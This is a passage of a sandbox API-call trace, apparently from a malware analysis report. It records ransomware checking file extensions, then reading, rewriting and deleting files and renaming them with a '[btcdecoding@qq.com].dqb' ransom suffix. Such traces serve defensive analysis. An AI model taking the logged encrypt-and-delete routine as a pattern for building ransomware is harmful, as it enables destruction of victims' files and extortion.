(lpString=".zip") returned 4 [0041.274] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0041.274] lstrlenW (lpString=".rar") returned 4 [0041.274] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0041.274] lstrlenW (lpString=".bz2") returned 4 [0041.274] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0041.274] lstrlenW (lpString=".7z") returned 3 [0041.274] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0041.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.274] lstrlenW (lpString=".dbf") returned 4 [0041.274] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0041.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.274] lstrlenW (lpString=".1cd") returned 4 [0041.274] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0041.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.274] lstrlenW (lpString=".jpg") returned 4 [0041.274] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0041.275] lstrcmpiW (lpString1=".gif", lpString2=".dqb") returned 1 [0041.275] lstrlenW (lpString="Connectivity.gif") returned 16 [0041.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.275] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=2319) returned 1 [0041.275] CloseHandle (hObject=0x208) returned 1 [0041.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif")) returned 0x20 [0041.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.275] lstrlenW (lpString=".doc") returned 4 [0041.275] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0041.275] lstrlenW (lpString=".docx") returned 5 [0041.275] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1 [0041.275] lstrlenW (lpString=".pdf") returned 4 [0041.275] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0041.275] lstrlenW (lpString=".xls") returned 4 [0041.275] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0041.275] lstrlenW (lpString=".xlsx") returned 5 [0041.275] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1 [0041.275] lstrlenW (lpString=".ppt") returned 4 [0041.275] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0041.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.276] lstrlenW (lpString=".zip") returned 4 [0041.276] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0041.276] lstrlenW (lpString=".rar") returned 4 [0041.276] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0041.276] lstrlenW (lpString=".bz2") returned 4 [0041.276] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0041.276] lstrlenW (lpString=".7z") returned 3 [0041.276] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0041.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.276] lstrlenW (lpString=".dbf") returned 4 [0041.276] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0041.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.276] lstrlenW (lpString=".1cd") returned 4 [0041.276] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0041.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.276] lstrlenW (lpString=".jpg") returned 4 [0041.276] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0041.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.276] lstrlenW (lpString=".doc") returned 4 [0041.276] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0041.276] lstrlenW (lpString=".docx") returned 5 [0041.276] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1 [0041.276] lstrlenW (lpString=".pdf") returned 4 [0041.276] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0041.276] lstrlenW (lpString=".xls") returned 4 [0041.276] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0041.276] lstrlenW (lpString=".xlsx") returned 5 [0041.276] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1 [0041.276] lstrlenW (lpString=".ppt") returned 4 [0041.276] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0041.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.276] lstrlenW (lpString=".zip") returned 4 [0041.276] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0041.276] lstrlenW (lpString=".rar") returned 4 [0041.276] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0041.277] lstrlenW (lpString=".bz2") returned 4 [0041.277] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0041.277] lstrlenW (lpString=".7z") returned 3 [0041.277] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0041.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.277] lstrlenW (lpString=".dbf") returned 4 [0041.277] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0041.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.277] lstrlenW (lpString=".1cd") returned 4 [0041.277] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0041.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0041.277] lstrlenW (lpString=".jpg") returned 4 [0041.277] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0041.277] lstrcmpiW (lpString1=".ini", lpString2=".dqb") returned 1 [0041.277] lstrlenW (lpString="Desktop.ini") returned 11 [0041.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.277] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=645) returned 1 [0041.277] CloseHandle (hObject=0x208) returned 1 [0041.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 0x26 [0041.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.278] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.278] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.278] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0041.278] GetLastError () returned 0x0 [0041.278] ReadFile (in: hFile=0x208, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x285, lpOverlapped=0x0) returned 1 [0041.279] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x290, lpOverlapped=0x0) returned 1 [0041.279] ReadFile (in: hFile=0x208, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.280] WriteFile (in: hFile=0x204, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0041.280] SetEndOfFile (hFile=0x204) returned 1 [0041.280] CloseHandle (hObject=0x204) returned 1 [0041.280] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.280] SetEndOfFile (hFile=0x208) returned 1 [0041.281] CloseHandle (hObject=0x208) returned 1 [0041.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x26) returned 1 [0041.281] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1 [0041.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.282] lstrlenW (lpString=".doc") returned 4 [0041.282] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0041.282] lstrlenW (lpString=".docx") returned 5 [0041.282] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0041.282] lstrlenW (lpString=".pdf") returned 4 [0041.282] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0041.282] lstrlenW (lpString=".xls") returned 4 [0041.282] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0041.282] lstrlenW (lpString=".xlsx") returned 5 [0041.282] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0041.282] lstrlenW (lpString=".ppt") returned 4 [0041.282] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0041.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.282] lstrlenW (lpString=".zip") returned 4 [0041.282] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0041.282] lstrlenW (lpString=".rar") returned 4 [0041.282] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0041.282] lstrlenW (lpString=".bz2") returned 4 [0041.282] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0041.282] lstrlenW (lpString=".7z") returned 3 [0041.282] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0041.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.282] lstrlenW (lpString=".dbf") returned 4 [0041.282] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0041.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.282] lstrlenW (lpString=".1cd") returned 4 [0041.282] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0041.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.282] lstrlenW (lpString=".jpg") returned 4 [0041.282] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0041.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.282] lstrlenW (lpString=".doc") returned 4 [0041.282] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0041.282] lstrlenW (lpString=".docx") returned 5 [0041.282] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0041.283] lstrlenW (lpString=".pdf") returned 4 [0041.283] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0041.283] lstrlenW (lpString=".xls") returned 4 [0041.283] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0041.283] lstrlenW (lpString=".xlsx") returned 5 [0041.283] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0041.283] lstrlenW (lpString=".ppt") returned 4 [0041.283] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0041.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.283] lstrlenW (lpString=".zip") returned 4 [0041.283] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0041.283] lstrlenW (lpString=".rar") returned 4 [0041.283] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0041.283] lstrlenW (lpString=".bz2") returned 4 [0041.283] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0041.283] lstrlenW (lpString=".7z") returned 3 [0041.283] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0041.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.283] lstrlenW (lpString=".dbf") returned 4 [0041.283] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0041.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.283] lstrlenW (lpString=".1cd") returned 4 [0041.283] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0041.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0041.283] lstrlenW (lpString=".jpg") returned 4 [0041.283] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0041.283] lstrcmpiW (lpString1=".emf", lpString2=".dqb") returned 1 [0041.283] lstrlenW (lpString="Dotted_Lines.emf") returned 16 [0041.283] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.284] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=3792) returned 1 [0041.284] CloseHandle (hObject=0x208) returned 1 [0041.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf")) returned 0x20 [0041.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.284] lstrlenW (lpString=".doc") returned 4 [0041.284] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0041.284] lstrlenW (lpString=".docx") returned 5 [0041.284] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1 [0041.284] lstrlenW (lpString=".pdf") returned 4 [0041.284] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0041.284] lstrlenW (lpString=".xls") returned 4 [0041.284] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0041.284] lstrlenW (lpString=".xlsx") returned 5 [0041.284] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1 [0041.284] lstrlenW (lpString=".ppt") returned 4 [0041.284] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0041.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.284] lstrlenW (lpString=".zip") returned 4 [0041.284] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0041.284] lstrlenW (lpString=".rar") returned 4 [0041.284] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0041.284] lstrlenW (lpString=".bz2") returned 4 [0041.284] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0041.284] lstrlenW (lpString=".7z") returned 3 [0041.284] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0041.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.285] lstrlenW (lpString=".dbf") returned 4 [0041.285] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0041.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.285] lstrlenW (lpString=".1cd") returned 4 [0041.285] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0041.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.285] lstrlenW (lpString=".jpg") returned 4 [0041.285] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0041.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.285] lstrlenW (lpString=".doc") returned 4 [0041.285] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0041.285] lstrlenW (lpString=".docx") returned 5 [0041.285] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1 [0041.285] lstrlenW (lpString=".pdf") returned 4 [0041.285] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0041.285] lstrlenW (lpString=".xls") returned 4 [0041.285] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0041.285] lstrlenW (lpString=".xlsx") returned 5 [0041.285] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1 [0041.285] lstrlenW (lpString=".ppt") returned 4 [0041.285] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0041.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.286] lstrlenW (lpString=".zip") returned 4 [0041.286] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0041.286] lstrlenW (lpString=".rar") returned 4 [0041.286] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0041.286] lstrlenW (lpString=".bz2") returned 4 [0041.286] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0041.286] lstrlenW (lpString=".7z") returned 3 [0041.286] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0041.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.286] lstrlenW (lpString=".dbf") returned 4 [0041.286] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0041.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.286] lstrlenW (lpString=".1cd") returned 4 [0041.286] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0041.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0041.286] lstrlenW (lpString=".jpg") returned 4 [0041.286] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0041.286] lstrcmpiW (lpString1=".htm", lpString2=".dqb") returned 1 [0041.286] lstrlenW (lpString="Garden.htm") returned 10 [0041.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.286] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=231) returned 1 [0041.286] CloseHandle (hObject=0x208) returned 1 [0041.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0x20 [0041.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.287] lstrlenW (lpString=".doc") returned 4 [0041.287] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0041.287] lstrlenW (lpString=".docx") returned 5 [0041.287] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0041.287] lstrlenW (lpString=".pdf") returned 4 [0041.287] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0041.287] lstrlenW (lpString=".xls") returned 4 [0041.287] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0041.287] lstrlenW (lpString=".xlsx") returned 5 [0041.287] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0041.287] lstrlenW (lpString=".ppt") returned 4 [0041.287] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0041.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.287] lstrlenW (lpString=".zip") returned 4 [0041.287] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0041.287] lstrlenW (lpString=".rar") returned 4 [0041.287] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0041.287] lstrlenW (lpString=".bz2") returned 4 [0041.287] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0041.287] lstrlenW (lpString=".7z") returned 3 [0041.287] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0041.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.287] lstrlenW (lpString=".dbf") returned 4 [0041.287] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0041.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.287] lstrlenW (lpString=".1cd") returned 4 [0041.287] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0041.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.287] lstrlenW (lpString=".jpg") returned 4 [0041.287] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0041.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.288] lstrlenW (lpString=".doc") returned 4 [0041.288] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0041.288] lstrlenW (lpString=".docx") returned 5 [0041.288] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0041.288] lstrlenW (lpString=".pdf") returned 4 [0041.288] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0041.288] lstrlenW (lpString=".xls") returned 4 [0041.288] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0041.288] lstrlenW (lpString=".xlsx") returned 5 [0041.288] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0041.288] lstrlenW (lpString=".ppt") returned 4 [0041.288] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0041.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.288] lstrlenW (lpString=".zip") returned 4 [0041.288] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0041.288] lstrlenW (lpString=".rar") returned 4 [0041.288] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0041.288] lstrlenW (lpString=".bz2") returned 4 [0041.288] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0041.288] lstrlenW (lpString=".7z") returned 3 [0041.288] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0041.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.288] lstrlenW (lpString=".dbf") returned 4 [0041.288] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0041.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0041.288] lstrlenW 